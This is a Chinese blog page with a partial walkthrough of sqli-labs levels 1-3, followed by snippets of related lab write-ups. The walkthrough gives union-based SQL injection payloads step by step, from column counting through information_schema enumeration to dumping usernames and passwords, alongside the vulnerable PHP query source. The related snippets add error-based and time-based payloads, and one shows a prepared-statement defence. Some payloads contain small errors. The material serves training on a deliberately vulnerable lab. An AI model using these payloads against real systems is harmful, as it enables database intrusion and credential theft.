sqllab 1-8

最新推荐文章于 2024-11-09 08:46:05 发布
最新推荐文章于 2024-11-09 08:46:05 发布
阅读量295 收藏 1
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ce666666/article/details/119851673
版权
本文详细介绍了Sql注入的各种类型,包括基于错误的单引号字符注入、整数注入、字符型注入、双引号字符注入、布尔盲注和报错注入。通过对不同注入方法的实例分析,帮助读者理解和防范Sql注入攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

写在前面

1.本着理解sql代码点来学习。
2.想要了解多种sql注入的类型和方式。
3.学了两年,啥也不是,现在反过来反省反省。
4.活在自己舒适区,想试图跳出来,别让自己在该奋斗的年纪选择躺平。
5.如有错误,希望各位师傅提出,我及时改正。

Sql注入

简介:常见的数据库攻击手段,用户通过在表单中填写包含 SQL 关键字的数据来使数据库执行非常 规代码的过程。
类型:
1.字符型注入
2.数字型注入
3.盲注
4.报错注入
5.联合查询注入
6.堆查询注入

less 1 基于错误的单引号字符注入

尝试手工注入,输入单引号,返回错误提示。
在这里插入图片描述   报错信息:near “1” LIMIT 0,1‘ at line 1
这里-1的作用是查询不存在的值,使得结果为空,-1’ or 1=1 # //这里注释用错,换成 --+即可。
在这里插入图片描述
接下来就是进行常规的注入

-1' order by 1 --+ //显示上面的图,说明存在列数为1
-1' order by 4 --+ //报错,显示Unknown column '4' in 'order clause',说明存在列数为3
-1' union select 1,2,3 --+ //显示页面的位置
-1' union select 1,2,database() --+ //爆库
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+   //爆表
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' --+ //爆列
-1 ' union select 1,username,password from users --+ //爆数据

sql源码

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

  传入id类型为int,传入1‘#,前面的语句为’1‘,#将后面的给注释,加个;让服务器查找到并结束语句
在这里插入图片描述

less 2 基于错误的get整数注入

尝试单引号注入,发现注入得到
在这里插入图片描述
 猜测为get整数型注入,原因是有两双引号,多余一个引号没有闭合,把逗号去掉,显示数据。

-1 order by 1 --+       //先判断字段,由于是-1所以不显示数据,1的话就显示1的数据,当到4的时候显示Unknown column '4' in 'order clause',得到字段为3
-1 union select 1,database() --+ //获取数据库
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ // 获取表
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='' --+ // 获取字段
-1 union select 1,2,select 'id',(select 列名 from 库名.表名 limit 0.1) //获取数据

less 3 基于错误的字符型注入

加单引号,注入发现问题
在这里插入图片描述
 猜测类型为字符型注入,查看源码

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; //这里增加了括号,用")"进行闭合即可。

-1') order by 1 --+ //
最低0.47元/天 解锁文章
Sql-lab全解_sqllab(1),网络安全线程池基础入门和简单实践以及使用技巧
04-06 1028
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqllab通关记录
Anonymous24的博客
07-22 231
sqllab 且视他人之凝目如盏盏鬼火,大胆地去走你的夜路。 搭建sqllabsql文件夹复制到phpstudy下的WWW目录中 打开sqllab文件编辑db-creds.inc,编辑密码为root,并且在phpstudy中修改mysql密码为一致 Less-1 sqllab正常运行 寻找可能的注入点 输入?id=1' 尝试报错 可以看出数据库为mysql并且报错内容为'1'' limit 0,1 猜测源原来的数据库语句可能是'select * from xx where.
sqllab 第一关
aliexiansheng的博客
10-22 567
一、正常访问 判断是否存在注入 http://127.0.0.1/sqllab/Less-1/?id=1' 标白部分为实际的报错内容,可以看出因为写入的’拼接到语句中造成原语句的单引号多余,导致报错。 通过添加的 – + 注释掉后续查询语句,达到语句正常执行的目的 二、猜解当前数据库列数以及页面中的显示位置 http://127.0.0.1/sqllab/Less-1/?id=1'order by 1 --+ http://127.0.0.1/sqllab/Less-1/?id=1'order by 2
sqllab 1-6 练习
wxh的博客
11-05 2745
前言 什么是sql注入? 攻击者通过构造不同的sql语句来实现对数据库的操作 两个关键 :参数用户可控 参数带入数据库查询 基本流程 判断注入点 判断字段数 判断回显点 查询相关内容 判断库名----> 判断表明---->判断列名----->判断数据 搭建 复制文件到 D:\phpstudy_pro\WWW 创建网站 设置根目录为该文件 注意 php版本需要为 5.4.45 至此 搭建完成 less-1 GET - Error based - Sin...
sqllab 第二关
aliexiansheng的博客
10-22 358
一、判断注入 报错与第一关报错有区别,少了几个字符。 第一关: ‘1’’ LIMIT 0,1 第二关:’ – LIMIT 0,1 没有提示闭合错误,再根据第二关的题目为整数型注入,所以换种方法。 http://127.0.0.1/sqllab/Less-2/?id=1 and 1=1 --+ //图一,正常显示 http://127.0.0.1/sqllab/Less-2/?id=1 and 1=2 --+ //图二,显示异常 图一: 图二: 证明参数id存在注入点。 二、判断列数以及回显位置 h
sqllab-less5
weixin_51558394的博客
03-24 754
Sqllabs-less5 体型为我最烦的布尔注入 大家这里需要知道几个函数 Length我们用来判断一下东西 Ascill 即是ascl码值判断用 接下俩进入正题 老规矩 直接进去我们发现 please input the id as parameter with numeric value 请以数字值作为参数输入用户标示符。的意思 ?id=1 在这里我们发现这里的注入点与之前不同 变成了 you are in---- 然后继续探测order 1-3发现没有4 这就
《从0到1000》sqli-labs1-75关解题记录
BaiScorpio的博客
05-17 1362
1
SQL注入实例(sqli-labs/less-23)
Thewei666的博客
08-08 316
闭合符号为单引号,通过测试发现过滤了注释,所以直接闭合。
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 840
一丢丢Sqli-labs小练习
Sql-lab全解_sqllab
2301_77033340的博客
04-12 903
这里推荐在password注入,因为会判断密码和账户的正确性,正确才会回显,如果这里在username注入则会比较麻烦经过测试这里回显位为2位得到数据库名称,和当前表名称得到表列得到数据。
Sql-lab全解
qq_59197927的博客
10-11 626
id=-1 union select null,null,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+group_concat()为输出格式 information_scheam这是个数据库中的表存放着数据库中各个表的信息。这里使用'")判断可能为数值型注入,也就不需要考虑闭合方式,回显大小为3位,位置后两位。
sql-lab (3)
qq_61768489的博客
08-16 991
SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在;结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。...
Sqllab第一关通关笔记
I_WORM的博客
03-10 906
知识点:明白数值注入和字符注入的区别联合查询:union 或者 union allconcat()concat_ws(分隔符,字符串)
sqllab第一关新手向解析
Deeeelete的博客
09-25 1062
1来到URL以PHP文件为结尾的界面,直接在文件后斜线构造?id=1’来判断,并通过报错的相关内容来分析,已知我们报错的内容为”1”LIMIT 0,1’,我们输入的内容是1’,所以后面的内容是’LIMIT 0,1’ 2这里我们判断它的字段数,使用order by n(数字) 来猜测,在猜测到字段4的时候报错,说明其中会有三个字段,语句中的%23是注释,用来消除后面不需要的语句,常有的注释有# %2...
sql-lab 通关Less1 -65(深入学习)
热门推荐
ST0new的博客
10-02 2万+
文章目录sql-lab 复现通关(深入学习)前言目的less-1 基于错误的单引号字符串Less-2 基于错误的get整型注入Less-3 基于错误的get单引号变形字符型注入Less-4 基于错误的GET双引号字符型注入Less-5 双注入GET单引号字符型注入Less-6 双注入GET双引号字符型注入Less-7 导出文件GET字符型注入Less-8 布尔型单引号GET盲注Less-9 ...
Sql-lab全解_sqllab(3),GitHub标星1w的网络安全架构师必备技能
04-06 876
这里uname被过滤了直接在passwd注入这里看到注入语句前面是updata采用报错注入最后爆出数据表的时候会报一个错误这里是数据库做了一个限制不允许读users表可以使用别名绕过将users表中的数据username和password存到一个别名为a的表中,这个时候就绕过了。
sql-lab 1~5
开心星人的博客
05-12 671
1 ?id=1 ?id=1' ?id=1%27--+ ?id=1' order by 1--+ ?id=1' order by 4--+ 所以有四个字段 ?id=1' union select 1,2,3--+ 因为web页面只能显示一行数据 ?id=-1' union select 1,2,3--+ 将让第一行数据显示不出来 或者 ?id=1' union select 1,2,3 limit 1,1--+ 可以看到有回显的字段2和字段3 ?id=-1' union select 1,2,g
sql-lab靶场
Zx244349115的博客
11-09 1081
然后我输入id=1’–+时报错,这时候我们可以输入id=1’)–+发现依然报错,之时我试试是不是双括号输入id=1’))–+,发现页面显示正常。使用新的参数sort,通过输入1,2,3表中出现不同数据,该sql语句是order by,sql语句参数没有引号且不能使用联合注入,有报错显示,所以我们可以使用updatexml进行报错。if(a,sleep(10),1)如果a结果是真的,那么执行sleep(10)页面延迟10秒,如果a的结果是假,执行1,页面不延迟。也是不支持的,因此也可以使用。
sql-lab Page-1
Jaychouzzk
01-06 470
Less-1 字符型注入,‘ payload:?id=1'and 1%23 Less-2 数字型注入 payload:?id=1 and 1 ?id=1 and 0 Less-3 字符型注入 payload:?id=1')and 1 %23 ?id=1')and 0 %23 Less-4 字符型注入 payload:?id=1")and...
sqllab
最新发布
03-08
### SQL编辑器与SQLLab平台介绍 #### SQL编辑器概述 SQL编辑器是一种用于编写、执行和管理结构化查询语言(SQL)语句的应用程序。这类工具通常提供语法高亮显示、自动完成功能以及错误检测等功能,帮助开发者更高效地工作。对于学习者而言,这些特性有助于理解复杂的查询逻辑并减少编程中的常见错误。 #### SQLLab平台特点 SQLLab 是一个开源的数据探索和可视化平台,允许用户通过直观界面构建复杂查询而无需深入了解底层技术细节。该平台支持多种数据源连接,包括但不限于MySQL、PostgreSQL和其他关系型数据库管理系统(RDBMS)[^1]。它不仅提供了基本的CRUD操作接口,还集成了丰富的图表展示选项以便于数据分析人员快速获得洞察力。 #### 使用场景举例 当涉及到像`Seed-Labs 2.0`这样的教育环境中时,学生可以利用SQLLab来实践所学的安全编码技巧,比如采用预处理语句防止SQL注入攻击。具体来说,在PHP应用程序中可以通过如下方式实现安全查询: ```php $stmt = $mysqli->prepare("SELECT name, local, gender FROM USER_TABLE WHERE id=? AND password=?"); $stmt->bind_param('is', $id, $hashed_password); // 'i'表示整数,'s'字符串 $result = $stmt->execute(); ``` 此代码片段展示了如何使用准备好的陈述(prepared statement)替代原始存在风险的动态拼接SQL字符串[^3]。这有效阻止了恶意输入被解释成额外的有效载荷从而保护了系统的安全性。 #### 安全性和权限控制的重要性 值得注意的是,除了正确实施预防措施外,还需要考虑访问级别设置以确保只有授权个人能够接触到敏感信息。例如,在某些情况下如果没有适当的身份验证机制,则任何拥有SQL编辑器访问权的人都可能检索整个数据库的内容[^2]。因此建议始终遵循最小特权原则授予必要的读取/写入权限给特定角色或组群成员。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值